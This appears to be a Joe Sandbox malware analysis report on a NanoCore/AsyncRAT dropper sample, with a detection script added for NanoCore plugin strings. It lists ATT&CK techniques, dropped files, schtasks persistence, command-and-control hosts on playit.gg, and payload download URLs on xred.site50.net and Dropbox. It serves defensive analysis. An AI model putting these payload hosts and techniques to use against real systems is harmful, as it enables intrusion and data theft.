            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6692, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5244, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED
Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Code function: cmd.exe /C 4_2_00475384
Source: C:\Users\user\Desktop\WINDOWS.EXE Code function: cmd.exe /C 9_2_00475384
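The string hits above (the NanoCore.ClientPlugin* type and interface names left in the dhcpmon.exe and Synaptics.exe memory regions) are exactly what a string-based Yara rule keys on. As an added example, not code from this report or from any rule it ran, the Python below scans a raw buffer for those names in both encodings a .NET assembly can carry them (UTF-8 in the #Strings heap, UTF-16LE once the runtime materialises them) and only calls the buffer a NanoCore plugin host when several distinct names are present. The sample buffers are constructed; the marker list and the threshold of three are this example's choices.

```python
"""Added example (not Joe Sandbox or NanoCore code): flag a buffer as a NanoCore
client plugin host from the .NET metadata names the report's string hits show."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Type and interface names copied from the metadata string dump above.
# The list and the threshold below are this example's choices.
NANOCORE_MARKERS = (
    "NanoCore.ClientPluginHost",
    "NanoCore.ClientPlugin",
    "IClientNetworkHost",
    "IClientLoggingHost",
    "IClientNameObjectCollection",
    "RebuildHostCache",
    "DisableProtection",
    "ClientPlugin.dll",
)


@dataclass(frozen=True)
class Hit:
    marker: str
    offset: int
    encoding: str  # "ascii" (#Strings heap) or "utf-16-le" (#US heap, live strings)


def _compile(encoding: str) -> re.Pattern[bytes]:
    # Longest alternative first, so "NanoCore.ClientPluginHost" is not also
    # reported as an overlapping hit on "NanoCore.ClientPlugin".
    alts = sorted((m.encode(encoding) for m in NANOCORE_MARKERS), key=len, reverse=True)
    return re.compile(b"|".join(re.escape(a) for a in alts))


_PATTERNS = {enc: _compile(enc) for enc in ("ascii", "utf-16-le")}


def scan(buf: bytes) -> list[Hit]:
    """Return every marker occurrence, in offset order, in either encoding."""
    hits: list[Hit] = []
    for encoding, pattern in _PATTERNS.items():
        for mo in pattern.finditer(buf):
            hits.append(Hit(mo.group(0).decode(encoding), mo.start(), encoding))
    return sorted(hits, key=lambda h: h.offset)


def distinct_markers(buf: bytes) -> set[str]:
    return {h.marker for h in scan(buf)}


def is_nanocore_plugin_host(buf: bytes, min_distinct: int = 3) -> bool:
    """Verdict needs several *different* names: "ClientPlugin.dll" on its own is
    a plausible file name in unrelated software."""
    return len(distinct_markers(buf)) >= min_distinct


# Constructed inputs (not real samples): a fragment shaped like a .NET #Strings
# heap (NUL-separated UTF-8 names), a UTF-16LE string, and a benign-looking blob.
SAMPLE_STRINGS_HEAP = (
    b"\x00<Module>\x00mscorlib\x00NanoCore.ClientPluginHost\x00IClientNetworkHost\x00"
    b"IClientLoggingHost\x00RebuildHostCache\x00ClientPlugin.dll\x00"
)
SAMPLE_UTF16 = b"\x00\x00" + "NanoCore.ClientPlugin".encode("utf-16-le") + b"\x00\x00"
SAMPLE_BENIGN = b"MZ\x90\x00This program cannot be run in DOS mode.\x00ClientPlugin.dll\x00"


if __name__ == "__main__":
    for name, buf in (("strings-heap", SAMPLE_STRINGS_HEAP),
                      ("utf16", SAMPLE_UTF16), ("benign", SAMPLE_BENIGN)):
        verdict = "NANOCORE" if is_nanocore_plugin_host(buf) else "no verdict"
        print(f"{name}: {verdict}; hits={[(h.marker, h.offset, h.encoding) for h in scan(buf)]}")
```

Run it against a memory dump or a dropped PE read as bytes; the distinct-marker threshold is what keeps a lone "ClientPlugin.dll" in an unrelated binary from producing a verdict.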
MITRE ATT&CK Matrix (Joe Sandbox mapping). Techniques are listed per tactic in the order of the original matrix; the number in parentheses is how many report signatures map to that technique, and a cell without a number had no hit.

Initial Access: Replication Through Removable Media (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools

Execution: Native API (2); Command and Scripting Interpreter (12); Scheduled Task/Job (2); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell

Persistence: DLL Side-Loading (1); Scheduled Task/Job (2); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron

Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (112); Scheduled Task/Job (2); Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron

Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (131); Software Packing (14); DLL Side-Loading (1); Masquerading (12); Virtualization/Sandbox Evasion (21); Access Token Manipulation (1); Process Injection (112); Hidden Files and Directories (1); Right-to-Left Override

Credential Access: Input Capture (21); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture

Discovery: System Time Discovery (2); Peripheral Device Discovery (1); Account Discovery (1); File and Directory Discovery (4); System Information Discovery (37); Security Software Discovery (331); Process Discovery (2); Virtualization/Sandbox Evasion (21); Application Window Discovery (11); System Owner/User Discovery (1); Remote System Discovery (1)

Lateral Movement: Replication Through Removable Media (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media

Collection: Archive Collected Data (11); Screen Capture (1); Input Capture (21); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium

Command and Control: Ingress Tool Transfer (4); Encrypted Channel (11); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (3); Application Layer Protocol (14); Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols

Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station

Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features

Impact: Modify System Partition; Device Lockout; Delete Device Data; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID: 560001; Sample: y8kdmHi6x3.exe; Start date: 26/01/2022; Architecture: WINDOWS; Score: 100), flattened here as a process tree. Numbers in square brackets are graph node ids, not PIDs; dropped-file paths are shown as the graph abbreviates them.

[2] Start
    DNS: saw4.playit.gg; chivalrous-condition.auto.playit.gg; agonizing-bat.auto.playit.gg
    Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 14 other signatures
    Started: y8kdmHi6x3.exe [12]; Synaptics.exe [16]; ._cache_WINDOWS.EXE [18]; dhcpmon.exe [20]
  [12] y8kdmHi6x3.exe
      Dropped: C:\Users\user\AppData\...\y8kdmHi6x3.exe.log (ASCII)
      Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file
      Started: y8kdmHi6x3.exe [22]
    [22] y8kdmHi6x3.exe
        Dropped: C:\Users\user\...\._cache_y8kdmHi6x3.exe (PE32); C:\ProgramData\Synaptics\Synaptics.exe (PE32); C:\...\Synaptics.exe:Zone.Identifier (ASCII)
        Started: ._cache_y8kdmHi6x3.exe [27]; Synaptics.exe [32]
      [27] ._cache_y8kdmHi6x3.exe
          Network: 192.168.2.1 (unknown, unknown)
          Dropped: C:\Users\user\Desktop\WINDOWS.EXE (PE32); C:\Users\user\Desktop\SYSTEM32.EXE (PE32)
          Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file
          Started: WINDOWS.EXE [34]; SYSTEM32.EXE [38]
        [34] WINDOWS.EXE
            Dropped: C:\Users\user\Desktop\._cache_WINDOWS.EXE (PE32)
            Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Contains functionality to detect sleep reduction / modifications
            Started: ._cache_WINDOWS.EXE [43]; Synaptics.exe [48]
          [43] ._cache_WINDOWS.EXE
              DNS: saw4.playit.gg; chivalrous-condition.auto.playit.gg
              Dropped: C:\Program Files (x86)\...\dhcpmon.exe (PE32); C:\Users\user\AppData\Roaming\...\run.dat (ISO-8859); C:\Users\user\AppData\Local\...\tmp939D.tmp (XML)
              Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
              Started: schtasks.exe [50]; schtasks.exe [52]
            [50] schtasks.exe -> conhost.exe [56]
            [52] schtasks.exe -> conhost.exe [58]
          [48] Synaptics.exe
              Signatures: Injects a PE file into a foreign processes
              Started: Synaptics.exe [54]
        [38] SYSTEM32.EXE
            Network: saw4.playit.gg 54.38.136.57 (ports 48129, 49749, 49751; OVHFR, France); 127.0.0.1 (unknown, unknown); agonizing-bat.auto.playit.gg
      [32] Synaptics.exe
          Signatures: Multi AV Scanner detection for dropped file; Drops PE files to the document folder of the user; Injects a PE file into a foreign processes
          Started: Synaptics.exe [41]
        [41] Synaptics.exe
            Network: docs.google.com 142.250.186.46 (ports 443, 49765, 49766; GOOGLEUS, United States); freedns.afraid.org 69.42.215.252 (ports 49768, 80; AWKNET-LLCUS, United States); xred.mooo.com
            Dropped: C:\Users\user\Documents\BNAGMGSPLO\~$cache1 (PE32); C:\Users\user\Desktop\y8kdmHi6x3.exe (PE32); C:\Users\user\Desktop\._cache_Synaptics.exe (PE32); 5 other malicious files
  [16] Synaptics.exe
      Started: Synaptics.exe [25]
    [25] Synaptics.exe
        Dropped: C:\ProgramData\...\._cache_Synaptics.exe (PE32)
  [18] ._cache_WINDOWS.EXE
  [20] dhcpmon.exe
Initial Sample
Source | Detection | Scanner | Label
y8kdmHi6x3.exe | 58% | Virustotal |
y8kdmHi6x3.exe | 49% | Metadefender |
y8kdmHi6x3.exe | 81% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoCore
y8kdmHi6x3.exe | 100% | Avira | HEUR/AGEN.1109339
y8kdmHi6x3.exe | 100% | Joe Sandbox ML |
Dropped Files
Source | Detection | Scanner | Label
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | HEUR/AGEN.1109339
C:\Users\user\AppData\Local\Temp\RCX831F.tmp | 100% | Avira | TR/Dropper.MSIL.Gen
C:\Users\user\Desktop\y8kdmHi6x3.exe | 100% | Avira | TR/Dropper.MSIL.Gen
C:\Users\user\Desktop\WINDOWS.EXE | 100% | Avira | WORM/Dldr.Agent.gqrxn
C:\Users\user\Desktop\WINDOWS.EXE | 100% | Avira | TR/Dropper.MSIL.Gen7
C:\Users\user\Desktop\WINDOWS.EXE | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\Users\user\Desktop\._cache_Synaptics.exe | 100% | Avira | WORM/Dldr.Agent.gqrxn
C:\Users\user\Desktop\._cache_Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\Users\user\Desktop\._cache_Synaptics.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\Desktop\SYSTEM32.EXE | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\RCX788E.tmp | 100% | Avira | TR/Dropper.MSIL.Gen
C:\Users\user\AppData\Local\Temp\yi1yMTqS.exe | 100% | Avira | HEUR/AGEN.1109339
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 100% | Avira | TR/Dropper.MSIL.Gen7
C:\ProgramData\Synaptics\._cache_Synaptics.exe | 100% | Avira | WORM/Dldr.Agent.gqrxn
C:\ProgramData\Synaptics\._cache_Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\._cache_Synaptics.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\Documents\BNAGMGSPLO\~$cache1 | 100% | Avira | HEUR/AGEN.1109339
C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | 100% | Avira | WORM/Dldr.Agent.gqrxn
C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\Desktop\._cache_WINDOWS.EXE | 100% | Avira | TR/Dropper.MSIL.Gen7
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RCX831F.tmp | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\y8kdmHi6x3.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\WINDOWS.EXE | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\._cache_Synaptics.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\SYSTEM32.EXE | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RCX788E.tmp | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\yi1yMTqS.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Synaptics\._cache_Synaptics.exe | 100% | Joe Sandbox ML |
C:\Users\user\Documents\BNAGMGSPLO\~$cache1 | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\._cache_WINDOWS.EXE | 100% | Joe Sandbox ML |
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 88% | Metadefender |
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 98% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoCore
C:\ProgramData\Synaptics\._cache_Synaptics.exe | 93% | ReversingLabs | Win32.Backdoor.AsyncRAT
C:\ProgramData\Synaptics\Synaptics.exe | 49% | Metadefender |
C:\ProgramData\Synaptics\Synaptics.exe | 81% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoCore
C:\Users\user\AppData\Local\Temp\RCX831F.tmp | 47% | Metadefender |
C:\Users\user\AppData\Local\Temp\RCX831F.tmp | 71% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoCore
C:\Users\user\AppData\Local\Temp\yi1yMTqS.exe | 49% | Metadefender |
C:\Users\user\AppData\Local\Temp\yi1yMTqS.exe | 81% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoCore
C:\Users\user\Desktop\._cache_Synaptics.exe | 93% | ReversingLabs | Win32.Backdoor.AsyncRAT
C:\Users\user\Desktop\._cache_WINDOWS.EXE | 88% | Metadefender |
C:\Users\user\Desktop\._cache_WINDOWS.EXE | 98% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoCore
Unpacked PE Files
Source | Detection | Scanner | Label
21.0.Synaptics.exe.400000.21.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
21.0.Synaptics.exe.400000.21.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
21.0.Synaptics.exe.400000.21.unpack | 100% | Avira | TR/Dropper.Gen
7.0.SYSTEM32.EXE.da0000.0.unpack | 100% | Avira | TR/Dropper.Gen
20.0.Synaptics.exe.870000.1.unpack | 100% | Avira | HEUR/AGEN.1109339
21.0.Synaptics.exe.e40000.20.unpack | 100% | Avira | HEUR/AGEN.1109339
16.0.._cache_WINDOWS.EXE.d70000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
21.0.Synaptics.exe.e40000.11.unpack | 100% | Avira | HEUR/AGEN.1109339
11.0.._cache_WINDOWS.EXE.5b0000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
23.0.Synaptics.exe.400000.8.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
23.0.Synaptics.exe.400000.8.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
23.0.Synaptics.exe.400000.8.unpack | 100% | Avira | TR/Dropper.Gen
4.0.y8kdmHi6x3.exe.400000.6.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
4.0.y8kdmHi6x3.exe.400000.6.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
4.0.y8kdmHi6x3.exe.400000.6.unpack | 100% | Avira | TR/Dropper.Gen
16.2.._cache_WINDOWS.EXE.d70000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
8.0.Synaptics.exe.bc0000.0.unpack | 100% | Avira | HEUR/AGEN.1109339
4.0.y8kdmHi6x3.exe.bc0000.2.unpack | 100% | Avira | HEUR/AGEN.1109339
4.2.y8kdmHi6x3.exe.400000.0.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
4.2.y8kdmHi6x3.exe.400000.0.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
4.2.y8kdmHi6x3.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
23.0.Synaptics.exe.400000.6.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
23.0.Synaptics.exe.400000.6.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
23.0.Synaptics.exe.400000.6.unpack | 100% | Avira | TR/Dropper.Gen
21.0.Synaptics.exe.e40000.3.unpack | 100% | Avira | HEUR/AGEN.1109339
4.0.y8kdmHi6x3.exe.bc0000.13.unpack | 100% | Avira | HEUR/AGEN.1109339
4.0.y8kdmHi6x3.exe.400000.16.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
4.0.y8kdmHi6x3.exe.400000.16.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
4.0.y8kdmHi6x3.exe.400000.16.unpack | 100% | Avira | TR/Dropper.Gen
21.0.Synaptics.exe.e40000.15.unpack | 100% | Avira | HEUR/AGEN.1109339
4.0.y8kdmHi6x3.exe.400000.10.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
4.0.y8kdmHi6x3.exe.400000.10.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
4.0.y8kdmHi6x3.exe.400000.10.unpack | 100% | Avira | TR/Dropper.Gen
21.2.Synaptics.exe.400000.0.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
21.2.Synaptics.exe.400000.0.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
21.2.Synaptics.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
23.0.Synaptics.exe.8b0000.20.unpack | 100% | Avira | HEUR/AGEN.1109339
4.0.y8kdmHi6x3.exe.bc0000.25.unpack | 100% | Avira | HEUR/AGEN.1109339
23.0.Synaptics.exe.400000.12.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
23.0.Synaptics.exe.400000.12.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
23.0.Synaptics.exe.400000.12.unpack | 100% | Avira | TR/Dropper.Gen
23.0.Synaptics.exe.8b0000.5.unpack | 100% | Avira | HEUR/AGEN.1109339
11.2.._cache_WINDOWS.EXE.5b0000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
20.0.Synaptics.exe.870000.3.unpack | 100% | Avira | HEUR/AGEN.1109339
21.0.Synaptics.exe.400000.12.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
21.0.Synaptics.exe.400000.12.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
21.0.Synaptics.exe.400000.12.unpack | 100% | Avira | TR/Dropper.Gen
15.0.Synaptics.exe.e80000.0.unpack | 100% | Avira | HEUR/AGEN.1109339
0.0.y8kdmHi6x3.exe.5b0000.0.unpack | 100% | Avira | HEUR/AGEN.1109339
23.2.Synaptics.exe.8b0000.4.unpack | 100% | Avira | HEUR/AGEN.1109339
6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack | 100% | Avira | TR/Dropper.Gen
20.0.Synaptics.exe.400000.16.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
20.0.Synaptics.exe.400000.16.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
20.0.Synaptics.exe.400000.16.unpack | 100% | Avira | TR/Dropper.Gen
20.0.Synaptics.exe.870000.11.unpack | 100% | Avira | HEUR/AGEN.1109339
4.0.y8kdmHi6x3.exe.400000.8.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
4.0.y8kdmHi6x3.exe.400000.8.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
4.0.y8kdmHi6x3.exe.400000.8.unpack | 100% | Avira | TR/Dropper.Gen
21.0.Synaptics.exe.e40000.0.unpack | 100% | Avira | HEUR/AGEN.1109339
23.0.Synaptics.exe.8b0000.7.unpack | 100% | Avira | HEUR/AGEN.1109339
21.0.Synaptics.exe.e40000.9.unpack | 100% | Avira | HEUR/AGEN.1109339
23.0.Synaptics.exe.400000.10.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
23.0.Synaptics.exe.400000.10.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
23.0.Synaptics.exe.400000.10.unpack | 100% | Avira | TR/Dropper.Gen
4.0.y8kdmHi6x3.exe.bc0000.0.unpack | 100% | Avira | HEUR/AGEN.1109339
20.0.Synaptics.exe.400000.10.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
20.0.Synaptics.exe.400000.10.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
20.0.Synaptics.exe.400000.10.unpack | 100% | Avira | TR/Dropper.Gen
23.0.Synaptics.exe.400000.14.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn
23.0.Synaptics.exe.400000.14.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006
Domains
No Antivirus matches
URLs
Source | Detection | Scanner | Label
http://xred.site50.net/syn/Synaptics.rarZ | 0% | Avira URL Cloud | safe
http://xred.site50.net/syn/Synaptics.rar | 4% | Virustotal |
http://xred.site50.net/syn/Synaptics.rar | 0% | Avira URL Cloud | safe
https://docs.goog | 0% | Virustotal |
https://docs.goog | 0% | Avira URL Cloud | safe
http://xred.site50.net/syn/SSLLibrary.dl | 0% | Avira URL Cloud | safe
http://xred.site50.net/syn/SSLLibrary.dll6 | 0% | Avira URL Cloud | safe
http://xred.site50.net/syn/SUpdate.iniZ | 0% | Avira URL Cloud | safe
http://xred.site50.net/syn/SUpdate.ini | 0% | Avira URL Cloud | safe
https://docs.goo | 0% | Avira URL Cloud | safe
http://xred.site50.net/syn/SSLLibrary.dlp | 0% | Avira URL Cloud | safe
http://xred.site50.net/syn/SUpdate.iniD0 | 0% | Avira URL Cloud | safe
http://xred.site50.net/syn/SUpdate.iniD0/ | 0% | Avira URL Cloud | safe
http://schemas.microsof | 0% | URL Reputation | safe
http://xred.site50.net/syn/SSLLibrary.dll | 0% | Avira URL Cloud | safe
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq | 0% | Avira URL Cloud | safe
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
freedns.afraid.org | 69.42.215.252 | true | false | | high
docs.google.com | 142.250.186.46 | true | false | | high
saw4.playit.gg | 54.38.136.57 | true | false | | high
chivalrous-condition.auto.playit.gg | unknown | unknown | false | | high
agonizing-bat.auto.playit.gg | unknown | unknown | false | | high
xred.mooo.com | unknown | unknown | false | | high
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl= | WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/Synaptics.rarZ | Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1 | Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978$1 | Synaptics.exe, 00000014.00000002.527570253.00000000012C9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1: | Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/Synaptics.rar | Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | 4%, Virustotal; Avira URL Cloud: safe | unknown
https://docs.goog | Synaptics.exe, 00000014.00000000.448364389.0000000008ECE000.00000004.00000010.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://docs.google.com/ | Synaptics.exe, 00000014.00000002.527672867.000000000131A000.00000004.00000020.00020000.00000000.sdmp; Synaptics.exe, 00000014.00000000.447489062.00000000079A3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/SSLLibrary.dl | WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://xred.site50.net/syn/SSLLibrary.dll6 | Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1: | Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1 | Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1 | Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/SUpdate.iniZ | Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docs.google.com/S | Synaptics.exe, 00000014.00000000.447489062.00000000079A3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8 | y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/SUpdate.ini | Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docs.goo | Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://xred.site50.net/syn/SSLLibrary.dlp | y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16 | Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/SUpdate.iniD0 | y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://xred.site50.net/syn/SUpdate.iniD0/ | WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.microsof | SYSTEM32.EXE | false | URL Reputation: safe | unknown
http://xred.site50.net/syn/SSLLibrary.dll | Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
